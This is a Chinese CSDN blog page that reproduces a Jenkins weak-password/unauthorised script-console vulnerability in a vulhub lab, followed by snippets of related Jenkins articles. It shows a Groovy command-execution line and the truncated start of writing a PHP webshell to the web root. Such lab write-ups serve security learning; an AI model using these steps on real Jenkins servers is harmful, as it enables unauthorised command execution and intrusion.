jenkins execute shell不执行_Jenkins 后台Getshsell Jenkins漏洞复现系列(完结)

最新推荐文章于 2024-05-31 00:12:25 发布
最新推荐文章于 2024-05-31 00:12:25 发布
阅读量1.4k 收藏
点赞数
文章标签: jenkins execute shell不执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35832025/article/details/113084414
版权

一、漏洞简介:

Jenkins是一个功能强大的应用程序,允许持续集成和持续交付项目,无论用的是什么平台。这是一个免费的源代码,可以处理任何类型的构建或持续集成。集成Jenkins可以用于一些测试和部署技术。Jenkins是一种软件允许持续集成。 

漏洞原因:jenkins 未设置帐号密码,或者使用了弱帐号密码

二、漏洞复现:

访问:target/manage,如果有未授权的话就直接可以进入如下界面,如果没有,尝试弱口令猜解,我这里用的是vulhub搭建的,账号密码:admin / admin

fed16ad3c99e6f12c4a44dbab831006c.png

1、执行命令并回显:

println "id".execute().text

执行结果:

cf8c5e16eefeb53099012c2946f3c121.png

2、上传shell文件

new File("/var/www/shell.php"
最低0.47元/天 解锁文章
嗨了伐得了
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Jenkins——应用篇——如何解决execute shell中启动的进程被在Job退出时被杀死问题
水猴的轨迹
08-22 1万+
在部落内部时不时的会有同学问一为什么在execute shell中不能启动tomcat、为什么在windows batch command中不能启动tomcat等问题,其实大部分情况下不是不能启动,而是启动后随着job结束进程被杀死,造成不能启动的假象,这一点从tomcat的日志中可以看来,虽然也给出了解决方法,但没有回答本质问题,利用周末和晚上的时间对这个问题进行探究,并总结下来供大家参考。
Jenkins文件读取漏洞拾遗(CVE-2024-23897)
离别歌
01-29 917
Jenkins 未授权文件读取漏洞(CVE-2024-23897)上周闹得沸沸扬扬,我也来简单分析一下这个漏洞,并看看这个文件读取如何利用。首先说的是,由于Jenkins存在版本和插件差异,所以利用时可能也有不一样之处,本文内容不一定适用于所有Jenkins server。我们这里使用Vulhub的环境(2.441)来做分析和演示:https://github.com/vulhub/vulhub/...
Jenkins中通过execute shell无法启动tomcat
weixin_33813128的博客
12-20 396
一、问题描述环境:192.168.2.20 jenkins服务器192.168.2.17 tomcat服务器设置jenkins与tomcat服务器相互免密钥登陆,shell在远程的tomcat服务器上的,用jenkins控制台去调用shell脚本。用jekins+shell搭建自动化部署更新tomcat,脚本在Linux下运行一切正常,但是当用jenkins构建完毕...
JARBAS - Jenkins渗透原理详解
最新发布
2301_82000839的博客
05-31 797
打靶正常的思路,先nmap扫,tcp、udp全扫一遍,防止漏掉信息80优先思路、22ssh爆破放最后普通扫目录无信息、根据网站信息猜测、再指定扫描测试对编码进行hash-id识别、解码、利用信息尝试登录要么是ssh登录、要么是8080的登录;进行尝试进入网站登录后利用jenkins常用的漏洞、写linux执行的bash环境payload进行反弹shell权限比较低;无权查看shadow;sudo也没思路;查看自启任务有root权限写入poc;5分钟自动进入了root权限。
Linux上用Jenkins执行shell
weixin_34235371的博客
10-20 103
2019独角兽企业重金招聘Python工程师标准>>> ...
Jenkins远程命令执行漏洞 CVE-2018-1000861 漏洞复现
ADummy的博客
03-04 542
Jenkins远程命令执行漏洞(CVE-2018-1000861) by ADummy 0x00利用路线 ​ 直接url执行 0x01漏洞介绍 ​ Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。 通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权用户可执行任意命令:Jenkins在沙盒中执行Groovy前会先检查脚本是
漏洞分析|死磕Jenkins漏洞回显与利用效果
m0_46699477的博客
06-28 1274
本文以 Jenkins 反序列化漏洞作为优化案例,分享我们的解决漏洞问题的方式。
jenkins的windows节点执行shell脚本
01-07
迁移jenkins时,需要依赖windows的节点,在网上查了资料装好以后,接下来简直就是噩梦,因为没有人指导,在...如果在job里使用了 Execute shell 在windows服务器上执行的会提示没有找到此命令,等类似的错误,这个
jenkins集成OWSAP ZAP插件方法
01-26
Jenkins是一款流行的自动化构建工具,通过集成OWASP ZAP插件,可以实现自动化安全漏洞扫描,提高软件开发过程中的安全性。本文将详细介绍如何在Jenkins中集成OWASP ZAP插件,实现自动化安全漏洞扫描。 一、准备工作...
Jenkins编译报错Failed to execute goal org.apache.maven.plugins_maven-clean-plugin
05-19
Failed to execute goal org.apache.maven.plugins:maven-clean-plugin:2.5:clean (default-clean) on project
利用jenkins实现不同条件下执行不同的构建步骤.docx
08-27
例如,我们可以添加一个 "Execute shell" 步骤,运行一些测试脚本,以及一个 "Copy artifacts from another project" 步骤,将构建好的 WAR 包传输到其他服务器。每个构建步骤都可以有其自身的条件,使得构建流程更...
docker-jenkins:Jenkins的Docker映像
05-18
docker-jenkins docker pull dustise/jenkins A Customizable docker image for Jenkins. With this image , you can simply add your own init groovy script, set your first administrator, even change the ...
15、jenkins
weixin_44797299的博客
02-03 1032
测试 docker、测试 maven、 测试 node、测试 golang、 测试 gcc、 测试 kubectl。k8s手撕yml方式部署最新版 Jenkins 2.441(jdk-21版)(jenkins-prod)访问地址:jenkins-prod.huanghuanhui.cloud。设置账号密码为:admin、Admin@2024。
漏洞通告】 Jenkins CLI 任意文件读取漏洞
y995zq的博客
01-30 2031
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。Jenkins 有一个内置的命令行界面(CLI),可从脚本或 shell 环境访问 Jenkins。处理 CLI 命令时, Jenkins 使用args4j库解析 Jenkins 控制器上的命令参数和选项。
使用 Jenkins 执行持续集成的几个实用经验分享
u014078904的博客
03-05 611
...
jenkins 部署 并执行npm run dev 项目时,execute shell自动结束进程问题
风.foxwho(神秘狐)
10-31 7566
使用 jenkins 部署 vue (npm run dev)项目时,部署状态是显示部署成功,但是服务没有成功启动,在做进程服务监控的时候发现,jenkins部署时候服务也启动成功了,但是jenkins部署成功后 自动kill杀死或结束该进程和该进程的衍生的进程,那么就让jenkins不用杀死衍生的进程 jenkins 部署 并执行npm run dev 项目时,execute shell自动结束...
jenkins无法执行shell脚本问题
weixin_43838503的博客
03-04 7848
1.如图,jenkins在构建的时候,打开控制台可以看到执行shell脚本那里,提示权限不足 2.这时候我们需要修改jenkin的配置文件和目录文件权限(不建议直接给777权限) vim /etc/sysconfig/kenkins 进去以后找到JENKINS_USER="jenkins" 这一行,修改为jenkins用户为root用户,如下 JENKINS_USER="root" 3.修改...
JenkinsShell实现最简单的持续部署
热门推荐
neutrojan的专栏
12-10 3万+
大量的有关持续集成的书籍与文档中,基本都提到了持续部署这个步骤,然而具体怎么实现,并没有通行的做法,对于典型的Java Web应用来说,大致有两个思路,一是通过web容器(如Tomcat、JBoss)提供的接口部署,这方面的代表就是Cargo,然而,其缺点是配置复杂且不够稳定,我的经验是,部署了很多次之后,容器的JVM就会内存溢出,当然这个和具体容器有关,部署多少次之后才溢出,也要看Web应用的
jenkins shell Build step 'Execute shell' marked build as failure
01-26
Jenkins Build step 'Execute shell' marked build as failure是指在Jenkins构建过程中,执行shell脚本的步骤被标记为失败。这可能是由以下原因导致的: 1. 磁盘空间不足:如果磁盘空间不足,执行shell脚本时可能会出错。您可以通过检查磁盘空间使用情况来解决此问题。 2. 缺少脚本解释器:在"Execute shell"构建步骤命令中,您需要添加脚本解释器。一般情况下,默认使用/bin/sh -xe作为脚本解释器。您可以尝试在脚本开头添加以下行来指定使用bash解释器: ```shell #!/bin/bash ``` 这样,Jenkins将使用/bin/bash来解释执行脚本。 请注意,以上是两种可能的原因和解决方法。具体原因可能因您的环境和配置而有所不同。您可以根据具体情况进行调查和排查。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值